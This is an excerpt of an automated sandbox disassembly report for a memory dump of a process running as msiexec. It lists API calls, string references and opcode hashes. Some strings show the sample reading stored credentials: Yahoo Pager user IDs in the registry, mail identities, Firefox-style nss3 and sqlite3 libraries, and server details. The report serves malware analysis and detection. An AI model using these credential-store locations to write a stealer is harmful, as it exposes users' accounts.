                                                                                                                                                      • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                                                                                      • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                                                                                                      • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                                                                                      • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ClassName_strcmpimemset
                                                                                                                                                      • String ID: edit
                                                                                                                                                      • API String ID: 275601554-2167791130
                                                                                                                                                      • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                                                                                      • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                                                                                                      • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                                                                                      • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: strlen$_mbscat
                                                                                                                                                      • String ID: 3CD
                                                                                                                                                      • API String ID: 3951308622-1938365332
                                                                                                                                                      • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                                                                                      • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                                                                                                      • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                                                                                      • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset
                                                                                                                                                      • String ID: rows deleted
                                                                                                                                                      • API String ID: 2221118986-571615504
                                                                                                                                                      • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                                                                      • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                                                                                                                                      • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                                                                      • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??2@$memset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1860491036-0
                                                                                                                                                      • Opcode ID: fb665ac2fefbd88b77538ab471de92cac26eee1f38b4faef847c6b5bb8c147a3
                                                                                                                                                      • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                                                                                                      • Opcode Fuzzy Hash: fb665ac2fefbd88b77538ab471de92cac26eee1f38b4faef847c6b5bb8c147a3
                                                                                                                                                      • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 0040D2C2
                                                                                                                                                      • memset.MSVCRT ref: 0040D2D8
                                                                                                                                                      • memset.MSVCRT ref: 0040D2EA
                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                      • memset.MSVCRT ref: 0040D319
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$memcpy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 368790112-0
                                                                                                                                                      • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                                                                      • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                                                                                                      • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                                                                      • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • too many SQL variables, xrefs: 0042C6FD
                                                                                                                                                      • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset
                                                                                                                                                      • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                                                                      • API String ID: 2221118986-515162456
                                                                                                                                                      • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                                                                      • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                                                                                                                      • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                                                                      • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                                                                                      • memset.MSVCRT ref: 004026AD
                                                                                                                                                        • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                                                        • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                                                        • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                                                                        • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                                                                                      • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3503910906-0
                                                                                                                                                      • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                                                                      • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                                                                                                                      • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                                                                      • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00409E0E
                                                                                                                                                        • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00409ED5
                                                                                                                                                      • strlen.MSVCRT ref: 0040B60B
                                                                                                                                                      • atoi.MSVCRT(?), ref: 0040B619
                                                                                                                                                      • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                                                                                      • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4107816708-0
                                                                                                                                                      • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                                                                                                      • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                                                                                                                      • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                                                                                                      • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                                                                                                                      APIs
                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                                                                                                                      • _gmtime64.MSVCRT ref: 00411437
                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                                                                                                                      • strftime.MSVCRT ref: 00411476
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1886415126-0
                                                                                                                                                      • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                                                                      • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                                                                                                                      • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                                                                      • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: strlen
                                                                                                                                                      • String ID: >$>$>
                                                                                                                                                      • API String ID: 39653677-3911187716
                                                                                                                                                      • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                                                                                                      • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                                                                                                      • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                                                                                                      • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                                                                                                                      APIs
                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpy
                                                                                                                                                      • String ID: @
                                                                                                                                                      • API String ID: 3510742995-2766056989
                                                                                                                                                      • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                                                      • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                                                                                                      • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                                                      • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _strcmpi
                                                                                                                                                      • String ID: C@$mail.identity
                                                                                                                                                      • API String ID: 1439213657-721921413
                                                                                                                                                      • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                                                                                      • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                                                                                                      • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                                                                                      • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 00444573
                                                                                                                                                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: QueryValuememset
                                                                                                                                                      • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                                                                      • API String ID: 3363972335-1703613266
                                                                                                                                                      • Opcode ID: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                                                                                                                      • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                                                                                                      • Opcode Fuzzy Hash: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                                                                                                                      • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 00406640
                                                                                                                                                        • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                                                                                        • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                                                        • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                                                      • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                                                                                                                                      • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpy$memset$memcmp
                                                                                                                                                      • String ID: Ul@
                                                                                                                                                      • API String ID: 270934217-715280498
                                                                                                                                                      • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                                                      • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                                                                                                      • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                                                      • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 004176F4: memcmp.MSVCRT(?,0044F118,00000008), ref: 004177B6
                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                                                                                                                      Strings
                                                                                                                                                      • recovered %d pages from %s, xrefs: 004188B4
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                                                                                                                      • String ID: recovered %d pages from %s
                                                                                                                                                      • API String ID: 985450955-1623757624
                                                                                                                                                      • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                                                                      • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                                                                                                                      • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                                                                      • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _ultoasprintf
                                                                                                                                                      • String ID: %s %s %s
                                                                                                                                                      • API String ID: 432394123-3850900253
                                                                                                                                                      • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                                                                                      • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                                                                                                      • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                                                                                      • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                                                                                                      APIs
                                                                                                                                                      • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                                                      • sprintf.MSVCRT ref: 0040909B
                                                                                                                                                        • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                                                                                        • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                                                                                        • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                                                                                        • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                                                                                        • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                                                                                        • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                                                                                        • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                                                                      • String ID: menu_%d
                                                                                                                                                      • API String ID: 1129539653-2417748251
                                                                                                                                                      • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                                                                      • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                                                                                                      • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                                                                      • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _msizerealloc
                                                                                                                                                      • String ID: failed memory resize %u to %u bytes
                                                                                                                                                      • API String ID: 2713192863-2134078882
                                                                                                                                                      • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                                                                      • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                                                                                                                      • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                                                                      • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                                                                                                                                      APIs
                                                                                                                                                      • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                        • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                                                        • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                                                      • _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _mbscat$_mbscpystrlen
                                                                                                                                                      • String ID: sqlite3.dll
                                                                                                                                                      • API String ID: 1983510840-1155512374
                                                                                                                                                      • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                                                                                      • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                                                                                                      • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                                                                                      • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                                                                                                      APIs
                                                                                                                                                      • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: PrivateProfileString
                                                                                                                                                      • String ID: A4@$Server Details
                                                                                                                                                      • API String ID: 1096422788-4071850762
                                                                                                                                                      • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                                                                      • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                                                                                                                      • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                                                                      • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                                                                                                                      APIs
                                                                                                                                                      • strlen.MSVCRT ref: 0040849A
                                                                                                                                                      • memset.MSVCRT ref: 004084D2
                                                                                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,67CB7B60,?,00000000), ref: 0040858F
                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,?,?,?,67CB7B60,?,00000000), ref: 004085BA
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3110682361-0
                                                                                                                                                      • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                                                                                      • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                                                                                                      • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
